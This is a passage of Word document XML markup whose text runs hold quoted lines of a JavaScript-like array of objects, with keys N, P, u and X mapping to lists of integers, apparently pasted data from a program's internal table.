        <w:t>&gt;&gt;         P: [0, 1, 2, 3],</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="662E4902" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;         u: [5]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="18B3C3B2" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;     }, {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="436741B4" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;         N: [7, 5, 1, 9],</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6B507F83" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;         P: [0, 1, 2, 3, 4, 5, 6, 7, 8, 9],</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0A38BEBA" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;         u: [33, 83, 177, 184, 199, 300, 302, 321, 336, 347]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3DF99C0B" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>&gt;&gt;     }, {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2BE42DDC" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;         N: [1],</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6BC01EEB" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;         P: [0, 1, 2, 3, 4],</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="446F20F2" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;         u: [68, 254]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="764FBC40" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;     }, {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6BF5E95F" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;         N: [0],</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5406C0BF" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;         P: [0],</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="221D3422" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;         u: [2, 4, 14, 17, 26]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5565C089" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;     }, {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3B982CD9" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;         X: 0,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="57FD5BF2" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;         N: [3],</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2DBD27F6" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;         P: [1, 2, 3, 4],</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4CB2C210" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;         u: []</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="00CBB469" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;     }, {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="21D4D665" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;         N: [],</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7D31A7A5" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;         P: [],</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="74F9712B" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;         u: [5, 8]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="20776965" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;     }, {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="20131B63" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;         N: [],</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="180E7AB0" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;         P: [0, 13, 20, 21, 22, 23, 24, 25, 26, 27, 28, 29, 30, 31, 32, 33, 34, 35],</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7E855D9E" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;         u: [1, 2, 3, 4, 5, 6, 7, 8, 9, 10, 11, 12, 14, 15, 16, 17, 18, 19, 159, 186, 317, 338]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5D6572A1" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;     }, {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="17EB6AA0" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;         X: 1,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3D663153" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;         N: [],</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="147F15A5" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;         P: [],</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6A6E2245" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;         u: [0]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1E25AE46" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>&gt;&gt;     }, {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="269B7AEA" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;         N: [],</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="35C7216D" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;         P: [0, 1, 2, 3, 4],</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="335A11D7" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;         u: [7, 18, 21, 22, 23, 24, 33, 35, 352]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="216B2446" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;     }, {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="265B49A1" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;         N: [3],</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="172461CF" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;         P: [3],</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="69C8FE24" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;         u: [0, 1, 2, 77]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5ECA90E7" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;     }, {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1C25E85A" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;         N: [],</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="754F96E4" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;         P: [0, 3, 5, 6, 7, 8],</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="095C8CA3" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;         u: [1, 2, 4, 10, 13, 14, 18, 20, 25, 26, 89, 128, 159]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3E8BFA98" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;     }, {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1B196799" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;         N: [1, 0],</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="38A80BE9" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;         P: [0, 1],</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="21DDAD62" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;         u: [17]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="505143DF" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;     }, {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="58A58F7D" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;         N: [],</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="627E8134" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;         P: [],</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2A2F9D15" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;         u: []</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7FA9E566" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;     }, {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="33D271CB" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;         N: [0],</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2B64366A" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;         P: [0],</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3E8846CA" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;         u: [1]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0D109BC3" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;     }, {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="51343C4A" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;         X: 2,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5BF9C26A" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>&gt;&gt;         N: [3, 0],</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="17A44D0E" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;         P: [0, 1, 3],</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="152CBED2" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;         u: []</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="70A1429F" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;     }, {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7585C0C6" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;         N: [5],</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2741653E" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;         P: [1, 3, 4, 5, 6, 7, 8],</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="12D5B200" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;         u: [0, 2]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2B1A5F80" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;     }, {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2DCE7F80" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;         X: 2,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="65FE2EB5" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;         N: [1],</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6352D475" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;         P: [0, 1, 3, 4],</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7BAD6C42" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;         u: [34]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="471F256C" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;     }, {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="10EB8D68" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;         N: [0, 16, 5, 11, 24, 19],</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="379C9B35" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;         P: [0, 1, 2, 3, 4, 5, 6, 7, 8, 9, 10, 11, 12, 13, 14, 15, 16, 17, 18, 19, 20, 21, 22, 23, 24, 25, 26, 27, 28],</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0DFB2496" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;         u: [89, 124, 128, 159, 245, 311, 317, 352]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="76B74A48" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;     }, {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="70A9AA68" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;         N: [0],</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="37FB5A88" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;         P: [0],</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="40CCEBE6" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;         u: [6, 28]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="10829DE4" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;     }, {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7DEFE44E" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;         N: [4],</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7716722E" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;         P: [1, 4, 5],</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="332733A4" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;         u: [0, 2, 3, 77]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="01F4E7D5" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;     }, {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2B6E9445" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>&gt;&gt;         N: [0],</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4C3AF642" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;         P: [0],</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0D060EA2" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;         u: [10]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3C6C095C" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;     }, {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="17AFE438" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;         N: [8],</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="51D2EAFF" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;         P: [0, 2, 3, 5, 6, 7, 8, 9, 10, 11, 12],</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="238E0A63" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;         u: [1, 4, 18, 25, 89, 128]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1B3131F6" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;     }, {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="49567479" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;         N: [3, 1],</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="14BF1216" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;         P: [0, 1, 2, 3],</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="01259E74" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;         u: [40, 330]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1B3C6E0F" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;     }, {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7856E57A" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;         N: [1, 3],</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="38AE6F39" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;         P: [0, 1, 2, 3, 4, 5],</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="16ED9D2D" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;         u: [33, 83, 184, 347]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="34B3750E" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;     }, {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="639E6C48" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;         N: [15, 8, 3, 9, 24, 11],</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4FACE9F6" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;         P: [0, 1, 2, 3, 4, 5, 6, 8, 9, 10, 11, 12, 13, 14, 15, 16, 17, 18, 19, 20, 21, 23, 24, 25],</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="37985A1C" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;         u: [7, 22, 53, 131, 159, 197, 265, 297, 311, 317, 351, 352]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6AC5B28B" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;     }, {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3D5F7E8D" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;         N: [],</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1386AB09" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;         P: [],</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="305C3A82" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;         u: [2, 3, 11, 12, 35, 62, 149, 238, 322, 333, 353]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5D3D5694" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;     }, {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="152F654D" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;         N: [8, 11, 1],</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="564E0646" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;         P: [0, 1, 2, 3, 4, 5, 6, 7, 8, 9, 10, 11],</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0A539A54" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>&gt;&gt;         u: [17]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="44543566" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;     }, {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6D915C53" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;         N: [],</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7C8FC6EC" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;         P: [0, 1, 2, 5, 6, 11, 12, 15, 16, 17, 18, 19, 20, 21, 22, 23, 24, 25, 26, 27],</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="32CF45CB" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;         u: [3, 4, 7, 8, 9, 10, 13, 14, 29, 33, 34, 35, 76, 123, 159, 196, 287, 291, 295]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="54B5528A" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;     }, {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4B2C5126" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;         N: [1],</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7E31F08C" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;         P: [1],</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5CE63194" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;         u: [0, 12]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0608EB63" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;     }, {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1F3AE8AB" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;         N: [3],</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="31FCA856" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;         P: [1, 3, 4],</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="44D2B845" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;         u: [0, 2, 5, 269]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="62F3FE6A" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;     }, {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4574100F" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;         N: [5, 1, 9],</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1098EA57" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;         P: [0, 1, 2, 3, 4, 5, 6, 7, 8, 9, 10],</w:t>
      </w:r>
    </w:p>
